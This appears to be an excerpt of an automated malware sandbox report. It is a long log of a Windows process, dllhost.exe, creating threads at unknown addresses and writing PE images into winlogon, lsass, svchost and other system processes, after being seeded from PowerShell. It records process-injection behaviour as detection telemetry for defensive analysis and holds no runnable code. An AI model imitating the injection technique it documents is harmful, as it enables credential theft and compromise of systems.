Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4E122EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59C82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4E122EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59C82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E6E02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B2812EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E6E02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B2812EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C9A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6EDC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F2BD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29792EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35282EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C07B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C9A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7DEB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6EDC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F2BD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D7CE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29792EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A8152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35282EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 47802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C07B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D7CE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A8152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 47802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 92FE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 93102EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: C05B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFD52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35E72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F18C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F1912EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 7EAE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8752EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D8B32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3052EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B212EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B212EBC
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F4B920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 262F1CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19FF1630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2129B2D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 263841B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2234E120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
